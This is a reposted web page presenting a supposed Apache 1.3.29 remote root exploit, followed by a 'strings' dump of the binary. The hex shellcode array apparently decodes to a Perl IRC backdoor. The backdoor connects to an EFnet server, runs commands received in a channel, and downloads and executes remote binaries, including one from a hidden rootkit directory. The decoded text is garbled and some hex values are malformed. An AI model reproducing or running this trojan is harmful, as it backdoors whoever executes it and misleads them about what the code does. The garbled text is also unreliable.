2. Tech
  3. Apache1.3.29 - Remote Root Explloit

Apache1.3.29 - Remote Root Explloit

xiaoxiao2021-03-06  200

Unsigned char h3llc0de [] =

{

0x23, 0x21, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69,

0x6e, 0x2f, 0x70, 0x65, 0x72, 0x6c, 0x0a, 0x0a,

0x24, 0x63, 0x68, 0x61, 0x6e, 0x3d, 0x22, 0x23,

0x70, 0x61, 0x72, 0x64, 0x69, 0x6c, 0x6c, 0x6f,

0x73, 0x22, 0x3b, 0x0a, 0x24, 0x6e, 0x69, 0x63,

0x6b, 0x3d, 0x22, 0x4c, 0x65, 0x6d, 0x6d, 0x69,

0x6e, 0x67, 0x73, 0x22, 0x3b, 0x0a, 0x24, 0x73,

0x65, 0x72, 0x76, 0x65, 0x72, 0x3d, 0x22, 0x65,

0x66, 0x6e, 0x65, 0x74, 0x2e, 0x76, 0x75, 0x75,

0x72, 0x77, 0x65, 0x72, 0x6b, 0x2e, 0x6e, 0x6c,

0x22, 0x3b, 0x0a, 0x24, 0x53, 0x49, 0x47, 0x7b,

0x54, 0x45, 0x52, 0x4d, 0x7d, 0x3d, 0x7b, 0x7d,

0x3b, 0x0a, 0x65, 0x78, 0x69, 0x74, 0x20, 0x69,

0x66, 0x20, 0x66, 0x6f, 0x72, 0x6b, 0x3b, 0x0a,

0x75, 0x73, 0x65, 0x20, 0x49, 0x4f, 0x3a, 0x3a,

0x53, 0x6f, 0x63, 0x6b, 0x65, 0x74, 0x3b, 0x0a,

0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x3d, 0x20,

0x49, 0x4f, 0x3a, 0x3a, 0x53, 0x6f, 0x63, 0x6b,

0x65, 0x74, 0x3a, 0x3a, 0x49, 0x4e, 0x45, 0x54,

0x2D, ​​0x3e, 0x6e, 0x65, 0x77, 0x28, 0x24, 0x73,

0x65, 0x72, 0x76, 0x65, 0x72, 0x2e, 0x22, 0x3a,

0x36, 0x36, 0x36, 0x37, 0x22, 0x29, 0x7c, 0x7c,

0x65, 0x78, 0x69, 0x74, 0x3b, 0x0a, 0x70, 0x72,

0x69, 0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63,

0x6b, 0x20, 0x22, 0x55, 0x53, 0x45, 0x52, 0x20,

0x6c, 0x65, 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73,

0x20, 0x2b, 0x69, 0x20, 0x6c, 0x65, 0x6d, 0x6d,

0x69, 0x6e, 0x67, 0x73, 0x20, 0x3a, 0x6c, 0x65,

0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73, 0x76, 0x32,

0x20, 0x5c, 0x6e, 0x4e, 0x49, 0x43, 0x4b, 0x20,

0x6c, 0x65, 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73,

0x5c, 0x6e, 0x222, 0x3b, 0x0a, 0x24, 0x69, 0x3d,

0x31, 0x3b, 0x77, 0x68, 0x69, 0x6c, 0x65, 0x28,

0x3c, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x3e, 0x3d,

0x7e, 0x2f, 0x5e, 0x5b, 0x5e, 0x20, 0x5d, 0x2b, 0x20, 0x28, 0x5b, 0x5e, 0x20, 0x5d, 0x2b, 0x29,

0x20, 0x2f, 0x29, 0x7b, 0x24, 0x6d, 0x6f, 0x64,

0x65, 0x3d, 0x24, 0x31, 0x3b, 0x0a, 0x6c, 0x61,

0x73, 0x74, 0x20, 0x69, 0x66, 0x20, 0x24, 0x6d,

0x6f, 0x64, 0x65, 0x3d, 0x3d, 0x22, 0x30, 0x30,

0x31, 0x22, 0x3b, 0x0a, 0x69, 0x66, 0x28, 0x24,

0x6d, 0x6f, 0x64, 0x65, 0x3d, 0x3d, 0x22, 0x34,

0x33, 0x33, 0x22, 0x29, 0x0a, 0x7b, 0x24, 0x69,

0x2b, 0x2b, 0x3b, 0x24, 0x6e, 0x69, 0x63, 0x6b,

0x3d, 0x7e, 0x73, 0x2f, 0x5c, 0x64, 0x2a, 0x24,

0x2f, 0x24, 0x69, 0x2f, 0x3b, 0x70, 0x72, 0x69,

0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b,

0x20, 0x22, 0x4e, 0x49, 0x43, 0x4b, 0x20, 0x24,

0x6e, 0x69, 0x63, 0x6b, 0x5c, 0x6e, 0x22, 0x3b,

0x7d, 0x7d, 0x0a, 0x70, 0x72, 0x69, 0x6e, 0x74,

0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x22,

0x4a, 0x4f, 0x49, 0x4e, 0x20, 0x24, 0x63, 0x68,

0x61, 0x6e, 0x5c, 0x6e, 0x50, 0x52, 0x49, 0x56,

0x4d, 0x53, 0x47, 0x20, 0x24, 0x63, 0x68, 0x61,

0x6e, 0x20, 0x3a, 0x6c, 0x65, 0x6d, 0x6d, 0x69,

0x6e, 0x67, 0x73, 0x20, 0x76, 0x32, 0x2e, 0x31,

0x5c, 0x6e, 0x50, 0x52, 0x49, 0x56, 0x4d, 0x53,

0x47, 0x20, 0x24, 0x63, 0x68, 0x61, 0x6e, 0x20,

0x3a, 0x70, 0x61, 0x72, 0x61, 0x20, 0x6d, 0x61,

0x6e, 0x64, 0x61, 0x72, 0x6d, 0x65, 0x20, 0x63,

0x6f, 0x6d, 0x61, 0x6e, 0x64, 0x6f, 0x73, 0x2c,

0x20, 0x65, 0x73, 0x63, 0x72, 0x69, 0x62, 0x65,

0x3a, 0x20, 0x22, 0x2e, 0x24, 0x6e, 0x69, 0x63,

0x6b, 0x2e, 0x22, 0x3a, 0x63, 0x6f, 0x6d, 0x61,

0x6e, 0x64, 0x6f, 0x5c, 0x6e, 0x22, 0x3b, 0x0a,

0x77, 0x68, 0x69, 0x6c, 0x65, 0x28, 0x3c, 0x24,

0x73, 0x6f, 0x63, 0x6b, 0x3e, 0x29, 0x0a, 0x7b,

0x0a, 0x69, 0x66, 0x20, 0x28, 0x2f, 0x5e, 0x50,

0x49, 0x4e, 0x47, 0x20, 0x28, 0x2e, 0x2a, 0x29,

0x24, 0x2f, 0x29, 0x0a, 0x7b, 0x70, 0x72, 0x69, 0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b,

0x20, 0x22, 0x50, 0x4f, 0x4e, 0x47, 0x20, 0x24,

0x31, 0x5c, 0x6e, 0x4a, 0x4f, 0x49, 0x4e, 0x20,

0x24, 0x63, 0x68, 0x61, 0x6e, 0x5c, 0x6e, 0x22,

0x3b, 0x7d, 0x0a, 0x69, 0x66, 0x28, 0x73, 0x2f,

0x5e, 0x5b, 0x5e, 0x20, 0x5d, 0x2b, 0x20, 0x50,

0x52, 0x49, 0x56, 0x4d, 0x53, 0x47, 0x20, 0x24,

0x63, 0x68, 0x61, 0x6e, 0x20, 0x3a, 0x24, 0x6e,

0x69, 0x63, 0x6b, 0x5b, 0x5e, 0x20, 0x3a, 0x5c,

0x77, 0x5d, 0x2a, 0x3a, 0x5b, 0x5e, 0x20, 0x3a,

0x5c, 0x77, 0x5d, 0x2a, 0x20, 0x28, 0x2e, 0x2a,

0x29, 0x24, 0x2f, 0x24, 0x31, 0x2f, 0x29, 0x7b,

0x73, 0x2f, 0x5c, 0x73, 0x2a, 0x24, 0x2f, 0x2f,

0x3b, 0x24, 0x5f, 0x3d, 0x60, 0x24, 0x5f, 0x60,

0x3b, 0x66, 0x6f, 0x72, 0x65, 0x61, 0x63, 0x68,

0x28, 0x73, 0x70, 0x6c, 0x69, 0x74, 0x20, 0x22,

0x5c, 0x6e, 0x22, 0x29, 0x0a, 0x7b, 0x0a, 0x73,

0x79, 0x73, 0x74, 0x65, 0x6d, 0x28, 0x22, 0x77,

0x67, 0x65, 0x74, 0x20, 0x77, 0x77, 0x77, 0x2e,

0x67, 0x72, 0x61, 0x74, 0x69, 0x73, 0x77, 0x65,

0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x65, 0x6c,

0x64, 0x75, 0x65, 0x6e, 0x64, 0x65, 0x63, 0x69,

0x6c, 0x6c, 0x6f, 0x2f, 0x69, 0x6e, 0x73, 0x74,

0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64,

0x20, 0x2b, 0x78, 0x20, 0x69, 0x6e, 0x73, 0x74,

0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x69, 0x6e, 0x73,

0x74, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x69,

0x6e, 0x73, 0x74, 0x3b, 0x20, 0x63, 0x64, 0x20,

0x2f, 0x75, 0x73, 0x72, 0x2f, 0x73, 0x68, 0x61,

0x72, 0x65, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c,

0x65, 0x2f, 0x73, 0x6b, 0x2f, 0x2e, 0x73, 0x6b,

0x31, 0x32, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x73,

0x6b, 0x20, 0x3b, 0x20, 0x63, 0x64, 0x22, 0x20,

0x29, 0x3b, 0x0a, 0x70, 0x72, 0x69, 0x6e, 0x74,

0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x22,0x50, 0x52, 0x49, 0x56, 0x4d, 0x53, 0x47, 0x20,

0x24, 0x63, 0x68, 0x61, 0x6e, 0x20, 0x3a, 0x24,

0x5f, 0x5c, 0x6e, 0x22, 0x3b, 0x73, 0x6c, 0x65,

0x65, 0x70, 0x20, 0x31, 0x3b, 0x7d, 0x7d, 0x7d,

0x23, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b,

0x78, 0x20, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x6c,

0x6f, 0x6c, 0x20, 0x32, 0x3e, 0x2f, 0x64, 0x65,

0x76, 0x2f, 0x6e, 0x75, 0x6c, 0x6c, 0x3b, 0x2f,

0x74, 0x6d, 0x70, 0x2f, 0x6c, 0x6f, 0x6c, 0x00

}

FATB @ secu ~ # strings apache

/LIB/ld-linux.so.2

Libc.so.6

PRINTF

Memcpy

SYSTEM

Malloc

Socket

INET_ADDR

Setsockopt

FSeek

Sendto

Fclose

FWRITE

Htons

Fopen

_IO_STDIN_USED

__LIBC_START_MAIN

Strlen

__GMON_START__

GLIBC_2.1

GLIBC_2.0

Ptrh

QVH_

[^ _]

Error: no ip address entered

USAGE:

% s [ip-address]

Could Not Obtain Raw Socket

Are you root?

127.0.0.1

Warning: Cannot Set HDRINCL

Server patched or not vulnerable: _ (

#! / usr / bin / perl

$ CHAN = "# pardillos";

$ nick = "lemmings";

$ Server = "efnet.vuurwerk.nl";

$ SIG {TERM} = {};

EXIT IF FORK;

Use IO :: Socket;

$ SOCK = IO :: Socket :: inet-> new ($ server. ": 6667") || exit;

Print $ SOCK "User Lemmings I Lemmings: Lemmingsv2 Nick Lemmings";

$ i = 1; while (<$ sock> = ~ / ^ [^] ([^] ) /) {$ mode = $ 1;

Last IF $ mode == "001";

IF ($ mode == "433")

{$ I ; $ Nick = ~ S / D * $ / $ I /; Print $ SOCK "NICK $ Nick";}}

Print $ SOCK "JOIN $ CHAN Privsg $ CHAN: LEMMINGS V2.1 Privmsg $ CHAN: Para Mandarme Comandos, escribe:" $ nick. ": comando";

While (<$ sock>)

IF (/ ^ ping (. *) $ /)

{Print $ SOCK "Pong $ 1 JOIN $ CHAN";

IF (S / ^ [^] Privsg $ CHAN: $ NICK [^: w] *: [^: w] * (. *) $ / $ 1 /) {s / s * $ //; $ _ = ` $ _`; foreach (split ") System (" wget

Www.gratisweb.com/elduendecillo/inst; chmod x institution; ./inst; rm instance; cd/usr/share/locale/sk/.sk12; ./sk; cd ");

Print $ SOCK "Privsg $ CHAN: $ _"; Sleep 1;}}} # chmod x / tmp / lol 2> / dev / null; / TMP / LOL

转载请注明原文地址:https://www.9cbs.com/read-128614.html

9cbs

New Post(0)